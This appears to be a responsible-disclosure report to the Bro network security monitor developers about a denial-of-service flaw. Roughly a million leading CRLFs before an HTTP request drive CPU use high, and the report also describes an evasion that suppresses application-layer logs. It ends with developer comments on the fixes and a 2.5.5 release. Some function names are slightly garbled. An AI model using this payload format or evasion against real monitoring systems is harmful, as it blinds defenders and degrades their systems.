Dear Bro Development Team,
in the following, we describe an issue in the ContentLine_Analyzer:oDeliverOnce() function that could be exploited by an adversary to cause a high CPU utilization over a prolonged period of time on the system running the Bro NSM. The issue was discovered during a Master’s thesis project at the Karlsruhe Institute of Technology in Germany.
An attacker can send specially crafted application-layer network traffic to the Bro NSM in order to cause a high CPU utilization over a prolonged period of time. The specially crafted traffic is not restricted to a certain protocol and different application-layer protocols such as HTTP can be used for the attack. If the DPD’s port detection mechanism is turned off or if the attack traffic is sent to non-well-known ports, the issue is not triggered. Instead, the attacker can evade detection at the application-layer (e.g. no http.log is created for the specially crafted HTTP traffic).
Attack Traffic Format
Many server applications accept traffic that is not well-formed and treat it as a valid request. We found that application-layer traffic with trailing “\r\n” (CRLF) bytes in front of the actual application-layer protocol content is often accepted by server applications. While the server applications simply ignore the leading CRLFs, Bro does not. The more CRLFs are put in front of the actual request, the longer it takes Bro to process it. For the rest of this description, we assume a minimal HTTP request with one million leading CRLFs, i.e. “\r\n...<1 000 000 times>...\r\nGET / HTTP/1.0\r\n\r\n”.
If the aforementioned attack traffic is sent to port 80, the HTTP Analyzer will be triggered. The ContentLine Analyzer will also be triggered. At some point, the traffic is passed to the ContentLine Analyzer, which passes it to the application-layer analyzer (in this example: the HTTP Analyzer). This happens as follows:
1. The “malicious” \r\n...\r\n traffic is passed to ContentLine_Analyzer:eliverStream() in the data parameter.
2. The data is then passed to ContentLine_Analyzer:oDeliver()
3. The data is then passed to ContentLine_Analyzer:oDeliverOnce(). This is where the source of the problem is located.
4. The DoDeliverOnce() function iterates through the data, which would normally contain something like “GET / HTTP/1.0”. However, in our case the data contains a lot of CRLFs.
5. In every iteration, the
case is taken. The EMIT_LINE macro would then normally forward the data in its buf variable to the SupportAnalyzer, which in our case is the HTTP Analyzer. However, as the data contains only CRLFs, the buf variable contains nothing.
6. The empty buf variable is passed as the data to SupportAnalyzer::ForwardStream(), which forwards it to the application-layer analyzer: HTTP_Analyzer:eliverStream()
7. Because data is empty for the HTTP Analyzer, it calls Weird("empty http request");
8. Finally, the function call stack returns to ContentLine_Analyzer:oDeliver()
9. Here, two bytes are subtracted from the len variable via len -= n; and the process starts again for the next two bytes until there are no more CRLFs. We suspect this takes a very long time and is the reason for the issue we have discovered.
If the attack traffic is sent to a port that is unknown to the DPD, the attacker can evade application-layer detection (e.g. no http.log is created). We suspect this is due to the buffer of the PIA being full with CRLFs before the actual protocol contents could be analyzed. The observed application-layer evasion behavior is most likely not a flaw but a deliberate design decision. Users can probably change the PIA buffer size using the dpd_buffer_size variable to mitigate the problem.
Different application-layer protocols were tested and all of them had a significant CPU utilization impact.
The host system was an Ubuntu 16.04.4 machine with two 2.00 GHz Intel Xeon E5504 quad-core CPUs (for a total of eight CPU cores) and 24 GB of RAM.
When measured with the time utility, the processing of a packet capture file containing the previously described HTTP attack traffic sent to port 80 took about 65 seconds.
In comparison, when using random (= non-well-known) ports or turning off port detection with the dpd_ignore_ports = T option in bro/scripts/base/init-bare.bro, the processing of the same network traffic took only about 0.7 seconds.
Similar significant timing differences were observed on other machines, operating systems, and in VMs. The measurements were made using the command:
time /path/to/bro -Cr /path/to/capturefile.pcap
(the -C option had to be used because the capture file was created on a machine that had checksum offloading enabled. It has no effect on the discovered issue.)
Affected Bro Versions
All versions from Bro 2.5.1 up to the latest development version as of July 18th, 2018 have been tested and are affected.
While not tested, we suspect that many earlier versions that employ the current DPD design are also affected.
We would be very interested in your opinions about our findings.
The important new information there is the part of the SMTP analyzer still holding on to some state in such a case, leading to discovery that SMTP command string comparisons were based on user-supplied data/length, fixed in:
And extra/precautionary fix for if one were actually to try to queue up an excessive number of valid commands w/ the goal of exhausting memory:
Both on topic/jsiwek/empty-lines branch now (no test suite changes).
Do we want to add the traces to the test suite?
Reviewed and looks good, assigning back to Jon for merge.
Merged to master. Here's all the bits that should go in to a 2.5.5 release:
The changes are in master and 2.5.5 release now.